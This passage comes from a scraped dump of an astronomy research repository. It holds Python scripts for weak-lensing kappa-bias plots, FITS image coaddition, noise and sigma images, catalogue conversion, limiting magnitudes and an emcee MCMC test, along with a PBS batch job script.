np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_zoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol8 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_massoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol9 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass2overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol10 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass3overr_%s_%s_meds_8of64fields_increments.cat\" % 
(root,lens,inner,mag,rad), unpack=True)\ncol11 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass2rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol12 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass3rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol13 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass2overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol14 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol15 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_flexion_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol16 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_tidal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol17 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_SIS_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol18 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_oneoverr_SIShalo_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\n'''\ncol1 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol2 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_z_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol3 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol4 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol5 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol6 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol7 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_zoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol8 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_massoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol9 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol10 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol11 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol12 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol13 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overrrms_%s_%s_meds_8of64fields_increments.cat\" % 
(root,lens,inner,mag,rad), unpack=True)\ncol14 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol15 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_flexion_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol16 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_tidal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol17 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIS_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\ncol18 = np.loadtxt(\"%skappasimbiasphil_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIShalo_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\n'''\nmin_kappa_plot = -0.04\nmax_kappa_plot = 0.04\nnRows = 6\nnCols = 3\nnPlots = 18\nfontlabel = 18\n\nplt.clf()\n#plt.axis([min_kappa_plot, max_kappa_plot, 0, 800])\nfig = plt.figure()\nax1 = fig.add_subplot(6,3,1)\nax = plt.subplot(6,3,1, sharex=ax1, sharey=ax1)\n#ax.set_aspect(1, adjustable='datalim')\n\nax=plt.subplot(6,3,1, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col1/np.sum(col1 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$1$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,2, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col2/np.sum(col2 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$z$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,3, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col3/np.sum(col3 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M_\\star$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,4, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col4/np.sum(col4 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^2_\\star$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,5, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col5/np.sum(col5 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^3_\\star$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,6, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col6/np.sum(col6 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$1/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,7, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col7/np.sum(col7 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$z/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,8, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col8/np.sum(col8 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M_\\star/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,9, sharex=ax1, 
sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col9/np.sum(col9 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^2_\\star/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,10, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col10/np.sum(col10 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^3_\\star/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,11, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col11/np.sum(col11 * (bins[1]-bins[0])),'k-',label=\"xxx\")\n#ax.text(0.8, 0.85, \"$M/r^3$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\nax.text(0.6, 0.6, \"$M^2_\\mathrm{\\star,rms}$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,12, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col12/np.sum(col12 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^3_\\mathrm{\\star,rms}$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,13, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col13/np.sum(col13 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^2_\\star/r_\\mathrm{,rms}$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,14, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col14/np.sum(col14 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M^3_\\star/r_\\mathrm{,rms}$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,15, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')\nplt.plot(bins[:-1],col15/np.sum(col15 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M_\\star/r^3$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,16, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nax.set_xticklabels([-0.04,-0.03,-0.02,-0.01,0,0.01,0.02,0.03])\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col16/np.sum(col16 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$M_\\star/r^2$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,17, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nax.set_xticklabels([-0.04,-0.03,-0.02,-0.01,0,0.01,0.02,0.03])\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.xticks(rotation='vertical')\nplt.plot(bins[:-1],col17/np.sum(col17 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.6, 0.6, \"$\\sqrt{M_\\star}/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\nax=plt.subplot(6,3,18, sharex=ax1, sharey=ax1)\nax.tick_params(labelsize=14)\nax.set_xticklabels([-0.04,-0.03,-0.02,-0.01,0,0.01,0.02,0.03,0.04])\nplt.xlim(min_kappa_plot, max_kappa_plot)\n\nplt.plot(bins[:-1],col18/np.sum(col18 * (bins[1]-bins[0])),'k-',label=\"xxx\")\nax.text(0.5, 0.6, \"$\\sqrt{M_h}/r$\", fontsize=fontlabel, color='k',transform=ax.transAxes)\n\n# hide the plots with no data in the grid\nax=plt.subplot(6,3,16, sharex=ax1, 
sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.xticks(rotation='vertical')\nax=plt.subplot(6,3,18, sharex=ax1, sharey=ax1)\nplt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\nplt.xticks(rotation='vertical')\n\nindex = 1\nfor r in range(1, nRows +1):\n    for c in range(1, nCols + 1):\n        ax = plt.subplot(nRows, nCols, index, sharex=ax1, sharey=ax1)\n        index += 1\n        # Turn off y tick labels for all but the first column.\n        if ((c != 1) and (index <= nPlots)):\n            plt.setp(ax.get_yticklabels(), visible=False)\n            plt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\n        # Turn off x tick labels for all but the bottom plot in each column.\n        if ((nPlots - index) >= nCols):\n            plt.setp(ax.get_xticklabels(), visible=False)\n            plt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\n        if index == 18:\n            plt.setp(ax.get_yticklabels(), visible=False)\n            plt.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')\n\nfig.text(0.5, 0.025, '$\\kappa-\\kappa_\\mathrm{true}$', ha='center', va='center', size='22')\nplt.subplots_adjust(wspace=0, hspace=0)\nplt.subplots_adjust(left=0.02, right=0.98, top=0.98, bottom=0.15)\n\nplt.savefig('%sbiasphil_%s_%s_%s_%s.png' % (root,lens,inner,mag,rad), dpi=250)\n#plt.savefig('%sbiasphil_%s_%s_%s_%s_gamma.png' % (root,lens,inner,mag,rad), dpi=250)\nprint 'Done!'\n" }, { "alpha_fraction": 0.6235914230346680, "alphanum_fraction": 0.6961039304733276, "avg_line_length": 13.470588684082031, "blob_id": "26118ab0763282c3fd0c00d748ffd88bbad9bfff", "content_id": "53df1867d0175bf70a29e030ade102079484630", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, "license_type": "no_license", "max_line_length": 36, "num_lines": 17, "path": "/python/scripts/NAOJ/batch2_ascii.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb2.out\n#PBS -e Logb2.err\n#PBS -N 2\n#PBS -l mem=40gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython ascii_to_fits2.py\n" }, { "alpha_fraction": 0.688850462436676, "alphanum_fraction": 0.7156438827514648, "avg_line_length": 38.86206817626953, "blob_id": "40593975ee3f3e135243a8a8f32c8230e36ea5ce", "content_id": "b31787ac6997f13873fee1f6347655eb06d39bc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1157, "license_type": "no_license", "max_line_length": 295, "num_lines": 29, "path": "/python/reduction_utilities/weightedcoadd.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Weighted coaddition of science frames and weight frames. A final science frame and a variance frame are created. Currently only works for variance frames as weight frames. Uses equations 22 and 23 from the SWarp manual. If regions of the weight files are NaN, they are replaced with infinity.\n# Run as: python weightedcoadd.py sci1.fits sci2.fits ... var1.fits var2.fits ... 
outsci.fits outvar.fits\n\nimport numpy as np\nimport sys\nimport math\nfrom numpy import inf\nfrom astropy.io import fits\n\nnr = (len(sys.argv)-3)/2\n\nfor i in range(nr):\n    image = fits.open(sys.argv[1+i])\n    weight = fits.open(sys.argv[1+i+nr])\n    datai = image[0].data\n    dataw = weight[0].data\n    dataw[np.isnan(dataw)]=np.inf\n    if i == 0:\n        finalweight = 1.0/dataw # for variance\n        finaldatanominator = 1.0/dataw * datai\n    else:\n        finalweight = finalweight + 1.0/dataw\n        finaldatanominator = finaldatanominator + 1.0/dataw * datai\n\nimage[0].data = 1.0 * finaldatanominator/finalweight # to preserve the header info\nweight[0].data = 1.0/finalweight\nimage.writeto(sys.argv[-2],clobber=True)\nweight.writeto(sys.argv[-1],clobber=True)\n\n" }, { "alpha_fraction": 0.6926863789558411, "alphanum_fraction": 0.7250351905822754, "avg_line_length": 47.034481048583984, "blob_id": "76607b51a6c7635516b993c3817734ef348e1264", "content_id": "85c36f715ea65378fff4be3486d40f2ebc54f17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1422, "license_type": "no_license", "max_line_length": 177, "num_lines": 29, "path": "/python/modeling_utilities/sigma.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Create a simple sigma image given the original image and assuming just Poisson noise. This is written for Chih-Fan's iteration code, but can be used in general\r\n# Since the original image is typically sky subtracted, the code uses the sky variance in a selected empty region in the image, and Poisson for everything above 2 sigma of that.\r\n# Also defines a box outside of which the noise is set very large\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nfrom astropy.io import fits\r\n\r\nemptyloc = [30,200] # center of box with no sources in the image, to compute statistics\r\nemptysize = 20 # semilength of box\r\noutsidebox_x = [130,230] # min and max coord outside of which noise is considered infinite\r\noutsidebox_y = [80,180]\r\n\r\nfilein = str(sys.argv[1])\r\nimage = fits.open(filein)\r\ndata = image[0].data.T # so I work in the natural axis\r\n\r\nstd = np.std(data[emptyloc[0]-emptysize:emptyloc[0]+emptysize,emptyloc[1]-emptysize:emptyloc[1]+emptysize])\r\ndata = np.abs(data) + std ** 2\r\ndata = np.sqrt(data)\r\n\r\nbox = data[outsidebox_x[0]:outsidebox_x[1],outsidebox_y[0]:outsidebox_y[1]]\r\ndata[outsidebox_x[0]:outsidebox_x[1],outsidebox_y[0]:outsidebox_y[1]] = -np.abs(box)\r\ndata[data > 0] = 100 * np.max(np.abs(box))\r\ndata[outsidebox_x[0]:outsidebox_x[1],outsidebox_y[0]:outsidebox_y[1]] = np.abs(box)\r\n\r\nimage[0].data = data.T.astype(\"float32\") # Hostlens expects this\r\nimage.writeto(filein[:-5]+\"_sigma.fits\",clobber=True)\r\n" }, { "alpha_fraction": 0.5458922386169434, "alphanum_fraction": 0.5895275473594666, "avg_line_length": 54.38333511352539, "blob_id": "3016bda2d4996c0a6456a51c868212f29c78d60f", "content_id": "45a6d970931e05356a8f145e5a6f422b84d8742f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 186, "num_lines": 60, "path": "/python/catalogue_utilities/ascii_to_fitsPG1115.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, July 22 2018\n# Reads an ascii file with multiple columns and converts it into a FITS file with same data types and header. 
Optionally output only selected columns and conditions.\n\nimport sys\nimport numpy as np\n#import fitsio # https://github.com/esheldon/fitsio\nimport astropy.table as table\nimport glob\nimport time\nimport collections\n\n#root = '/lfs08/rusucs/HE0435/'\nroot = '/Volumes/LaCieDavis/CFHTlens/'\nrootout = '/Volumes/LaCieDavis/CFHTcatalogues/'\n#list = glob.glob(root+'nobetaave3435NEWMEASUREDmedinject_ugriz_HE0435_GGL_los_8_*_120.cat')\nlistfile = '/Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/fields.cat'\nlist = np.genfromtxt(listfile,dtype='S')\nstart_time = time.time()\n#for i in range(1):\nfor i in range(len(list)):\n    print list[i]\n    #list=['W3p2p3']\n    headfile = open(root+list[i]+'.cat', 'r')\n    head1 = headfile.readline() # first line\n    head2 = headfile.readline() # second line\n    head = False\n    if (head1.split()[0][0] == '#' and len(head1.split()[0:]) == len(head2.split())) or (head1.split()[0] == '#' and len(head1.split()[1:]) == len(head2.split())): # if there is a header\n        if head1.split()[0][0] == '#' and len(head1.split()[0:]) == len(head2.split()):\n            head1 = head1.split()[0:] # ignore the # character\n            head1[0] = head1[0][1:]\n        else: head1 = head1.split()[1:]\n        head = True\n    dict = collections.OrderedDict()\n    for j in range(len(head2.split())):\n        if head1[j] in ['MASK','star_flag','MAG_r','MAGERR_r','id','ALPHA_J2000','DELTA_J2000','Flag']: # select desired columns\n            if head1[j] == 'id': data = np.genfromtxt(root+list[i]+'.cat',usecols=[j],unpack=True,dtype='S')\n            else: data = np.genfromtxt(root+list[i]+'.cat',usecols=[j],unpack=True)\n            #if data.dtype == np.float64: type = 'float32'\n            #else: type = data.dtype\n            type = data.dtype\n            if head == True:\n                dict[head1[j]] = np.array(data, dtype=type)\n            else:\n                dict['col%s' %j] = np.array(data, dtype=type)\n            del data\n    dict['Flag'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n    data1 = dict['id'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n    data2 = dict['ALPHA_J2000'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n    data3 = dict['DELTA_J2000'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n    data4 = dict['MAG_r'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n    data5 = dict['MAGERR_r'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n    data6 = dict['Flag'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n    dict['id'] = data1; dict['ALPHA_J2000'] = data2; dict['DELTA_J2000'] = data3; dict['MAG_r'] = data4; dict['MAGERR_r'] = data5; dict['Flag'] = data6;\n    del dict['MASK']; del dict['star_flag']\n    del data1; del data2; del data3; del data4; del data5; del data6;\n    t = table.Table(dict)\n    del dict\n    t.write(rootout+list[i]+'_r24galphot.fits', overwrite = True)\n    del t\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n" }, { "alpha_fraction": 0.6958333253860474, "alphanum_fraction": 0.7145833373069763, "avg_line_length": 28, "blob_id": "61bb3fd8be12a881f836ed4a54adf2bb66e63890", "content_id": "22bb5e98bc5f23c8b7d29e9f21347057fb63f631", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 480, "license_type": "no_license", "max_line_length": 177, "num_lines": 16, "path": "/python/modeling_utilities/insertnoise.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# 
Given an image containing flux from a perfect model, as well as a value for the original (unsubtracted) sky, create an image containing pure Poisson noise, with null sky level\r\n\r\nimport numpy as np\r\nfrom astropy.io import fits\r\n\r\nmodel = \"ilens_out_model.fits\"\r\nsky = 250000\r\n\r\nimage = fits.open(model)\r\ndata = image[0].data\r\ndata = data + sky\r\nnoise = np.random.poisson(data)\r\nnoise = noise - sky\r\nimage[0].data = noise\r\n\r\nimage.writeto(model[:-5]+\"_noise.fits\",clobber=True)\r\n" }, { "alpha_fraction": 0.5811688303947449, "alphanum_fraction": 0.6228355169296265, "avg_line_length": 36.71428680419922, "blob_id": "3bf9724151283e263538e3a5c56ebb41e19e36e7", "content_id": "8892ee98126245cfe7b898330e050f1ad6147090", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 214, "num_lines": 49, "path": "/python/image_utilities/limmag.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Calculates limiting mag from a given region in an image\n\nfrom astropy.io import fits\nimport numpy as np\n\ndef lim_mag(image,zpt,scale,xpix,ypix):\n    i=fits.open(image)\n    y=i[0].data\n    listx=[]\n    listy=[]\n    for j in range(y.shape[0]):\n        for k in range(y.shape[1]):\n            if ((j-xpix)*scale)**2+((k-ypix)*scale)**2<=4:\n                listx=listx+[j]\n                listy=listy+[k]\n    list=[]\n    for x in range(len(listx)):\n        list=list+[y[listx[x],listy[x]]]\n    lim=zpt-2.5*np.log10(5*np.sqrt(len(list))*np.std(np.asarray(list))) # 5 sigma\n    print lim\n    return lim\n\nzeropt = 23.57 #+ 2.5*np.log10(1020) # do I use the exposure time?\n#image =\"J1206_NIRI_nativescale_weightedmedian.fits\"\n#scale = 0.1164 # arcsec\n#image =\"J1206_NIRI_GMOSscale_weightedmedian.fits\"\n#scale = 0.1618 # arcsec\nimage =\"1016cut.fits\"\nscale = 0.052 # arcsec\n\nlimmag = np.array([])\nx = lim_mag(image,zeropt,scale,346,33)\nlimmag = np.append(limmag,x)\nx = lim_mag(image,zeropt,scale,280,236)\nlimmag = np.append(limmag,x)\nx = lim_mag(image,zeropt,scale,490,110)\nlimmag = np.append(limmag,x)\nx = lim_mag(image,zeropt,scale,340,160)\nlimmag = np.append(limmag,x)\nx = lim_mag(image,zeropt,scale,480,70)\nlimmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,980,420)\n#limmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,130,250)\n#limmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,470,120)\n#limmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,760,470)\n#limmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,530,620)\n#limmag = np.append(limmag,x)\n\nprint np.median(limmag),np.std(limmag)\n" }, { "alpha_fraction": 0.6691004633903503, "alphanum_fraction": 0.7006425261497498, "avg_line_length": 45.6533317565918, "blob_id": "3433a529eac8588bdeaaacbe7d22ddcd3fd5972c", "content_id": "f3498c9b15ae1f21b48ab2ac01126e107fa1ca56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3424, "license_type": "no_license", "max_line_length": 250, "num_lines": 75, "path": "/python/modeling_utilities/mytest_emcee.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import emcee\nimport corner\nimport numpy as np\nimport pylab as plt\nfrom matplotlib.ticker import MaxNLocator\n\n#np.random.seed(42) # for repeatability\ntheta_true = (25, 0.5)\nxdata = 100 * np.random.random(20)\nydata = theta_true[0] + theta_true[1] * xdata\nydata = np.random.normal(ydata, 10) # add error\n\ndef log_prior(theta):\n    alpha, beta, sigma = 
theta\n if sigma < 0:\n return -np.inf # log(0)\n #else:\n #return (-1.5 * np.log(1 + beta**2) - np.log(sigma))\n else:\n return 0.0 # flat prior\ndef log_like(theta, x, y):\n alpha, beta, sigma = theta\n y_model = alpha + beta * x\n return -0.5 * np.sum(np.log(2*np.pi*sigma**2) + (y-y_model)**2 / sigma**2)\ndef log_posterior(theta, x, y):\n return log_prior(theta) + log_like(theta,x,y)\n\nndim = 3 # number of parameters in the model\nnwalkers = 50 # number of MCMC walkers\nnburn = 1000 # \"burn-in\" to stabilize chains\nnsteps = 10000 # number of MCMC steps to take after burn-in\nstarting_guesses = np.random.rand(nwalkers, ndim)\nsampler = emcee.EnsembleSampler(nwalkers, ndim,log_posterior,args=[xdata,ydata])\n#sampler = emcee.EnsembleSampler(nwalkers, ndim,log_posterior,args=[xdata,ydata],threads = 4) # multiple processors\npos, prob, state = sampler.run_mcmc(starting_guesses, nburn)\n# plot the time laps, only for the burn-in\n\nplt.clf()\nfig, axes = plt.subplots(3, 1, sharex=True, figsize=(8, 9))\naxes[0].plot(sampler.chain[:, :, 0].T, color=\"k\", alpha=0.4)\naxes[0].yaxis.set_major_locator(MaxNLocator(5))\naxes[0].axhline(theta_true[0], color=\"#888888\", lw=2)\naxes[0].set_ylabel(\"$a$\")\naxes[1].plot(sampler.chain[:, :, 1].T, color=\"k\", alpha=0.4)\naxes[1].yaxis.set_major_locator(MaxNLocator(5))\naxes[1].axhline(theta_true[1], color=\"#888888\", lw=2)\naxes[1].set_ylabel(\"$b$\")\naxes[2].plot(np.exp(sampler.chain[:, :, 2]).T, color=\"k\", 